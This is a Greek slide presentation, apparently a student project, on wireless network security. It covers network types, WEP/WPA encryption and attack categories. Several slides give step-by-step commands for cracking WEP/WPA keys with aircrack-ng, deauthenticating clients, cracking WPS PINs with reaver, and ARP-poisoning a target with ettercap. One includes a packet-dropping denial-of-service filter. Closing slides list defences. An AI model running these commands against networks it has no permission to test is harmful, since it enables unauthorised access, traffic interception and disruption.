Η παρουσίαση φορτώνεται. Παρακαλείστε να περιμένετε

Η παρουσίαση φορτώνεται. Παρακαλείστε να περιμένετε

Είναι ένα σύστημα επικοινωνίας μέσω ηλεκτρομαγνητικών κυμάτων ανάμεσα σε σταθερούς και κινητούς χρήστες επιτρέποντας την μεταξύ τους διασύνδεση και ανταλλαγή.

Παρόμοιες παρουσιάσεις


Παρουσίαση με θέμα: "Είναι ένα σύστημα επικοινωνίας μέσω ηλεκτρομαγνητικών κυμάτων ανάμεσα σε σταθερούς και κινητούς χρήστες επιτρέποντας την μεταξύ τους διασύνδεση και ανταλλαγή."— Μεταγράφημα παρουσίασης:

1

2 Είναι ένα σύστημα επικοινωνίας μέσω ηλεκτρομαγνητικών κυμάτων ανάμεσα σε σταθερούς και κινητούς χρήστες επιτρέποντας την μεταξύ τους διασύνδεση και ανταλλαγή δεδομένων.Ανάλογα με την λειτουργικότητά τους χωρίζονται σε:  Ενσύρματα-Ασύρματα(φυσικό μέσο μετάδοσης).  Δημόσια-Ιδιωτικά(τρόπος πρόσβασης).  Τοπικά-Μητροπολιτικά-Ευρείας Κάλυψης(γεωγραφική κάλυψη) WLAN: Επιτρέπει πρόσβαση σε συγκεκριμένη γεωγραφική περιοχή χωρίς την παρουσία καλωδίων ή οπτικών ινών. Χρησιμοποιεί υπέρυθρες ή ραδιοσυχνότητες και τα δεδομένα μεταφέρονται μέσω ηλεκτρομαγνητικών σημάτων σε συχνότητες 2.4 και 5 GHz και στηρίζονται σε ένα σύνολο προτύπων του

3 ΠΛΕΟΝΕΚΤΗΜΑΤΑ:  Ευκολία-Άνεση  Φορητότηρα  Παραγωγηκότητα  Ανάπτυξη «μετώπου»  Δυνατότητα εξάπλωσης  Κόστος ΜΕΙΟΝΕΚΤΗΜΑΤΑ:  Ασφάλεια  Περιοχή λειτουργίας  Αξιοπιστία  Ταχύτητα

4 Η ασφάλεια ενός ασύρματου δικτύου θα πρέπει να γίνει σε διάφορα επίπεδα με διάφορους τρόπους, για να είναι όσο το δυνατόν δυσκολότερο να δημιουργηθεί βλάβη στο δίκτυο ή αν γίνει, να είναι πολύ περιορισμένη.  Λειτουργικό σύστημα  Επίπεδο δικτύου  ESSID  Φίλτρο MAC διευθύνσεων  IEEE 802.1x  IEEE 802.Hi  EAP  WEP/WPA

5 Κρυπτογράφηση είναι ο μετασχηματισμός των δεδομένων σε μορφή που δεν μπορεί να διαβαστεί από κανέναν παρά μόνο από αυτόν που διαθέτει το κατάλληλο κλειδί. Υπάρχουν δύο οικογένειες αλγόριθμων κρυπτογράφησης:  Οι συμμετρικοί αλγόριθμοι (ή αλγόριθμοι μυστικού κλειδιού)  Οι ασύμμετροι αλγόριθμοι(ή αλγόριθμοι δημόσιου κλειδιού)  WEP: Χρησιμοποιεί τον αλγόριθμο κρυπτογράφησης RC4, για τον οποίο πλέον υπάρχουν διαδεδομένες τεχνικές εύρεσης του μυστικού κλειδιού.  WPA/WPA2: Θεωρείται το πιο ασφαλές πρωτόκολλο κρυπτογράφησης. Αντικατέστησε το ανασφαλές WEP και χρησιμοποιεί τον αλγόριθμο CCMP, ο οποίος βασίζεται στον AES.

6 ΠΑΘΗΤΙΚΕΣ: Ως παθητικές ορίζονται οι επιθέσεις που δε συμπεριλαμβάνουν συμμετοχή του επιτιθέμενου στο δίκτυο. Επίθεση τέτοιου τύπου αποτελεί η Λήψη Πληροφοριών( Snooping/Footprinting ) ΕΝΕΡΓΗΤΙΚΕΣ: Οι ενεργητικές επιθέσεις προϋποθέτουν ότι ο επιτιθέμενος αναλαμβάνει ενεργή συμμετοχή στο δίκτυο. Οι ενεργητικές επιθέσεις χωρίζονται, σύμφωνα με το σκοπό που έχουν οι επιτιθέμενοι, σε τέσσερις βασικές κατηγορίες:  Ανάκτηση κωδικού(WEP/WPA/WPA-2 Cracking)  Τροποποίηση Δεδομένων(Man in the Middle Attack)  Μεταμφίεση(Spoofing)  Άρνηση Υπηρεσιών(Denial of Service)

7 Η πειραματική διαδικασία γίνεται σε περιβάλλον UNIX και απαιτεί την χρήση:  Laptop  Desktop  Ασύρματη κάρτα δικτύου(υποστήριξη λειτουργίας monitor mode)  Δρομολογητής  Διανομή Kali Linux  Virtual Box  Wireshark  Ettercap Οι πιο διαδεδομένοι τρόποι εισβολής είναι οι εξής:  Wi-Fi Cracking(WEP-WPA/WPA2)  WPS cracking  Man In The Middle  Mac Spoofing  DoS

8

9  airmon-ng  airmon-ng start wlan0  Kill  airodump-ng wlan0mon  airodump-ng –c(channel) –w(new_file) -bssid(π.χ.14:60:80:9D:91:18) wlan0mon  aircrack –ng new_file.cap

10  airmon-ng  airmon-ng start wlan0  Kill  airodump-ng wlan0mon  airodump-ng –c (αριθμός καναλιού) –w(file_name) –bssid  aireplay-ng -0 0 –a bssid wlan0mon  aircrack-ng –w /path/wordlist new_file.cap

11  airmon-ng  airmon-ng start wlan0  Kill  wash -i wlan0mon  reaver -i (monitormode) -c (channel) -b (targetbssid)–vv

12  ettercap –G  Οptions->Set Netmask  Sniff-> Uniffied sniffing  hosts->scan for hosts->host list  Mitm->ARP poisoning  Sniff remote connections  Start->start sniffing

13  Χρησιμοποιώντας τον Kwrite(text editor) γράφουμε το παρακάτω φίλτρο. if (ip.src == 'Target IP' || ip.dst == 'Target IP') { drop(); kill(); msg("Packet Dropped\n"); }  Το αποθηκεύουμε ως dos.eft  Ανοιγουμε γραμμή εντολών και πληκτρολογούμε: cd Desktop/ etterfilter dos.eft -o dos.ef  Ανοίγουμε το ettercap.  Sniff->Uniffied sniffing.  Hosts->Scan for Hosts.  Targets->Targets List->Add Target.  Mitm->ARP Poisoning  Φορτώνουμε το φίλτρο: Filters - Load Filter

14

15

16  WEP/WPA/WPA2 Για την προστασία μας χρησιμοποιούμε ένα σπάνιο SSID και ένα μεγάλο και πολύπλοκο passphrase για το δίκτυο μας το οποίο δεν περιέχει κοινές λέξεις όπως είναι ονόματα, τηλέφωνα και ημερομήνιες γέννησης.  WPS Ο πιο απλός τρόπος προστασιά μας σε αυτήν την περίπτωση είναι να απενεργοποιήσουμε το WPS μας μπαίνοντας στην σελίδα του setup του δρομολογητή μας,  ARP Poisoning Το πόσο εύκολο είναι ν' ανακαλύψουμε αν είμαστε το υποψήφιο θύμα μιας επίθεσης ARP poisoning εξαρτάται κυρίως από τα εργαλεία που έχουμε στη διάθεσή μας. Ένα από τα εργαλεία που ξεχωρίζει στην πλατφόρμα των Windows είναι το XArp, το οποίο παρεμπιπτόντως διατίθεται και για Linux.Επίσης αυτό που χρειάζεται να κάνει κάποιος είναι να χρησιμοποιήσει στατικές καταχωρήσεις στον πίνακα ARP. Σε έναν στατικό πίνακα ARP η διεύθυνση IP κάθε υπολογιστή του δικτύου είναι αντιστοιχισμένη μονοσήμαντα με μία διεύθυνση MAC. Έτσι, είναι πρακτικά αδύνατον κάποιος να αλλάξει τις αντιστοιχίσεις

17  Αλλαγή κωδικού πρόσβασης στον εξοπλισμό  Αλλαγη της προεπιλεγμένης IP διεύθυνσης του εξοπλισμού  Απόκρυψη/Αλλαγή SSID  Ενεργοποίηση κρυπτογράφησης(WPA,WPA-2,WEP)  MAC filtering  Απενεργοποίηση της ασύρματης διαχείρισης του εξοπλισμού  Απενεργοποιήση της απομακρυσμένης πρόσβασης  Μειωση της ισχύος εκπομπής του ασύρματου μέσου πρόσβασης  FIREWALLS  VPN’s  RADIUS  INTRUSION DETECTION SYSTEMS(IDSS)

18


Κατέβασμα ppt "Είναι ένα σύστημα επικοινωνίας μέσω ηλεκτρομαγνητικών κυμάτων ανάμεσα σε σταθερούς και κινητούς χρήστες επιτρέποντας την μεταξύ τους διασύνδεση και ανταλλαγή."

Παρόμοιες παρουσιάσεις


Διαφημίσεις Google